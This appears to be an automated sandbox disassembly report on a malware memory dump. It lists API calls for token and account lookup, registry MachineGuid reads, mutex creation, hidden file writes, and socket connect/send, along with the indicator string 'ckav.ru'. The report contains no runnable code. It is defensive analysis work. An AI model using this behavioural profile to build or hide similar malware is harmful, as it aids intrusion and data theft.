                                                      control_flow_graph 377 4061c3-4061f2 call 402bf2 call 4031e5 383 4061f4-4061ff GetLastError 377->383 384 40622a-40623b call 402b7c 377->384 385 406201-406203 383->385 386 406208-406228 call 4060ac call 4031e5 383->386 392 40624c-406258 call 402b7c 384->392 393 40623d-406249 call 40338c 384->393 388 406329-40632e 385->388 386->384 386->385 400 406269-406290 call 4031e5 GetTokenInformation 392->400 401 40625a-406266 call 40338c 392->401 393->392 407 406292-4062a0 call 402b7c 400->407 408 4062fe-406302 400->408 401->400 407->408 419 4062a2-4062b9 call 406086 407->419 409 406304-406307 call 403c40 408->409 410 40630d-40630f 408->410 418 40630c 409->418 414 406311-406317 call 402bab 410->414 415 406318-40631e 410->415 414->415 416 406320-406326 call 402bab 415->416 417 406327 415->417 416->417 417->388 418->410 426 4062f5-4062fd call 402bab 419->426 427 4062bb-4062e4 call 4031e5 LookupAccountSidW 419->427 426->408 427->426 432 4062e6-4062ec call 405b6f 427->432 434 4062f1-4062f3 432->434 434->426
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                                      • _wmemset.LIBCMT ref: 00406244
                                                      • _wmemset.LIBCMT ref: 00406261
                                                      • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                                      • LookupAccountSidW.ADVAPI32(00000000,?,?,?,00000000,?,?,00000009,C0862E2B,00000000,00000000), ref: 004062E0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wmemset$AccountErrorInformationLastLookupToken
                                                      • String ID: IDA$IDA
                                                      • API String ID: 3235442692-2020647798
                                                      • Opcode ID: 8f4c50f187fada40fa8616370cc6dbcfe75cac2a49f6409a7c25fc8b8f748027
                                                      • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                                      • Opcode Fuzzy Hash: 8f4c50f187fada40fa8616370cc6dbcfe75cac2a49f6409a7c25fc8b8f748027
                                                      • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 763 404e17-404e57 getaddrinfo 764 404e59-404e5b 763->764 765 404e5d-404e84 call 402b7c socket 763->765 766 404ecf-404ed3 764->766 769 404e86-404e96 call 402bab freeaddrinfo 765->769 770 404e98-404ea7 connect 765->770 778 404ec7-404ec9 769->778 771 404eb3-404ebe freeaddrinfo 770->771 772 404ea9-404eb1 call 404de5 770->772 776 404ec0-404ec6 call 402bab 771->776 777 404ecb 771->777 772->771 776->778 781 404ecd-404ece 777->781 778->781 781->766
                                                      APIs
                                                      • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                                      • socket.WS2_32(?,?,?), ref: 00404E7A
                                                      • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: freeaddrinfogetaddrinfosocket
                                                      • String ID:
                                                      • API String ID: 2479546573-0
                                                      • Opcode ID: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                                                      • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                                      • Opcode Fuzzy Hash: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                                                      • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 783 4040bb-4040f2 call 4031e5 CreateFileW 786 4040f8-404111 call 4031e5 783->786 787 40418d-404190 783->787 797 404113-404119 786->797 798 40417a 786->798 788 404192-4041a7 call 403c90 787->788 789 404184 787->789 788->789 796 4041a9-4041b8 call 403c59 788->796 791 404186-40418c 789->791 806 4041ba-4041d8 call 4040bb call 403d44 796->806 807 4041db-4041e4 call 402bab 796->807 797->798 801 40411b-404120 797->801 800 40417d-40417e call 403c40 798->800 808 404183 800->808 804 404122 801->804 805 404124-404140 call 4031e5 VirtualAlloc 801->805 804->805 805->798 816 404142-40415e call 4031e5 ReadFile 805->816 806->807 807->791 808->789 816->800 820 404160-404178 call 4031e5 816->820 820->800
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$AllocCreateReadVirtual
                                                      • String ID: .tmp
                                                      • API String ID: 3585551309-2986845003
                                                      • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                                      • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                                      • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                                      • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                                      • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                                      • GetLastError.KERNEL32 ref: 0041399E
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Error$CreateLastModeMutex
                                                      • String ID:
                                                      • API String ID: 3448925889-0
                                                      • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                      • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                                      • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                      • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                                      • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CreatePointerWrite
                                                      • String ID:
                                                      • API String ID: 3672724799-0
                                                      • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                      • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                                      • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                      • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                                        • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                                        • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                        • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$CreateFreeProcessThread_wmemset
                                                      • String ID: ckav.ru
                                                      • API String ID: 2915393847-2696028687
                                                      • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                                      • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                                      • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                                      • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                                      APIs
                                                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                      • _wmemset.LIBCMT ref: 0040634F
                                                        • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateNameProcessUser_wmemset
                                                      • String ID: CA
                                                      • API String ID: 2078537776-1052703068
                                                      • Opcode ID: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
                                                      • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                                      • Opcode Fuzzy Hash: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
                                                      • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                                      APIs
                                                      • SHRegSetPathW.SHLWAPI(00000000,?,00000000,-80000001,00412D05,00000002,EBB783D2,00000000,00000000,5,A,00412D05,-80000001,00000000,5,A,00000000,00000000), ref: 0041286C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Path
                                                      • String ID: 5,A
                                                      • API String ID: 2875597873-3842761921
                                                      • Opcode ID: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
                                                      • Instruction ID: e513a9aa1dc03f827004651369457c754081445531a40a51076ab4492d9af12d
                                                      • Opcode Fuzzy Hash: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
                                                      • Instruction Fuzzy Hash: 48D0C93214020DBBDF026EC1DC02F9A3F2AAB48754F004014BB18280A1D6B3A630ABA9
                                                      APIs
                                                      • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InformationToken
                                                      • String ID: IDA
                                                      • API String ID: 4114910276-365204570
                                                      • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                      • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                                      • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                      • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                                      APIs
                                                      • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc
                                                      • String ID: s1@
                                                      • API String ID: 190572456-427247929
                                                      • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                      • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                                      • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                      • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                                      APIs
                                                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                      • RegOpenKeyExA.KERNEL32(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                                      • RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateOpenProcessQueryValue
                                                      • String ID:
                                                      • API String ID: 1425999871-0
                                                      • Opcode ID: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
                                                      • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                                      • Opcode Fuzzy Hash: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
                                                      • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                                      APIs
                                                      • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CheckMembershipToken
                                                      • String ID:
                                                      • API String ID: 1351025785-0
                                                      • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                      • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                                      • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                      • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                                      APIs
                                                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                      • SHQueryValueExW.SHLWAPI(?,?,00000000,00000000,00000000,00000208,00000002,C170F4F3,00000000,00000000), ref: 00404C35
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateProcessQueryValue
                                                      • String ID:
                                                      • API String ID: 3318767951-0
                                                      • Opcode ID: d2beadab3bee545cf5c60f8980fe712c5f4b0e5d6cba08d7b965a56316f6b4bd
                                                      • Instruction ID: 79155844af0806bdf0c3860b022b506ec09407af8f096f74cdf457618d2260c4
                                                      • Opcode Fuzzy Hash: d2beadab3bee545cf5c60f8980fe712c5f4b0e5d6cba08d7b965a56316f6b4bd
                                                      • Instruction Fuzzy Hash: 16F0247290611436E7206E578E0DCAF7F3CCBC3B25B01003EF908B61C0DAB99A0181B8
                                                      APIs
                                                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                      • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,0000000A,C7F71852,00000000,00000000,00413CAD,0000001A,00000001), ref: 0040408F
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateFolderPathProcess
                                                      • String ID:
                                                      • API String ID: 398210565-0
                                                      • Opcode ID: 5a4567249377e1c5aacc7f09cc20ffc60836f4584ead4ee4f677cdbbf549426b
                                                      • Instruction ID: 7d0b33caadbb1370849e9dfd1ecad86b360ac2e9a1dca59c17201c727c4e1007
                                                      • Opcode Fuzzy Hash: 5a4567249377e1c5aacc7f09cc20ffc60836f4584ead4ee4f677cdbbf549426b
                                                      • Instruction Fuzzy Hash: 57E06D6260156136D23129A7AC09D6B6E7DCBD3FA5B00003FF708F52C1D96D990281BA
                                                      APIs
                                                      • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateDirectory
                                                      • String ID:
                                                      • API String ID: 4241100979-0
                                                      • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                      • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                                      • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                      • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                                      APIs
                                                      • GetNativeSystemInfo.KERNEL32(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoNativeSystem
                                                      • String ID:
                                                      • API String ID: 1721193555-0
                                                      • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                      • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                                      • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                      • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                                      APIs
                                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: PrivateProfileString
                                                      • String ID:
                                                      • API String ID: 1096422788-0
                                                      • Opcode ID: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
                                                      • Instruction ID: e6a1e737d40be81796f932fb1ea6dd5b05bd2579ff383e5fb5a00b3a8c54de51
                                                      • Opcode Fuzzy Hash: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
                                                      • Instruction Fuzzy Hash: 52D0C27604410DBFDF025EE1DC05CAB3F6EEB48354B408425BE2895021D637DA71ABA5
                                                      APIs
                                                      • SHGetValueW.SHLWAPI(?,?,?,?,?,?,00000002,DC1011D7,00000000,00000000), ref: 004049D8
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Value
                                                      • String ID:
                                                      • API String ID: 3702945584-0
                                                      • Opcode ID: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
                                                      • Instruction ID: 49132b90e07f175002bb52db16c83daeb6fc20f74050e769a3614ef6a11dfcc0
                                                      • Opcode Fuzzy Hash: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
                                                      • Instruction Fuzzy Hash: 71D0923214020DBBDF026ED1DC02FAA3F2AAB09758F104014FB18280A1C677D631AB95
                                                      APIs
                                                      • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: send
                                                      • String ID:
                                                      • API String ID: 2809346765-0
                                                      • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                      • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                                      • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                      • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                                      APIs
                                                      • SHEnumKeyExW.SHLWAPI(?,?,?,?,00000002,ECA4834B,00000000,00000000), ref: 004049FB
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Enum
                                                      • String ID:
                                                      • API String ID: 2928410991-0
                                                      • Opcode ID: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
                                                      • Instruction ID: fb20b8ae34c3d99b6a2ec1f59af3280c7c0bbdac25ffdbb9458fe1f208d0831b
                                                      • Opcode Fuzzy Hash: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
                                                      • Instruction Fuzzy Hash: 45D0023114430D7BEF115ED1DC06F597F1ABB49B54F104455BB18680E19673A6305755
                                                      APIs
                                                      • MoveFileExW.KERNEL32(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileMove
                                                      • String ID:
                                                      • API String ID: 3562171763-0
                                                      • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                      • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                                      • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                      • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                                      APIs
                                                      • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Startup
                                                      • String ID:
                                                      • API String ID: 724789610-0
                                                      • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                      • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                                      • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                      • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                                      APIs
                                                      • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                      • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                                      • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
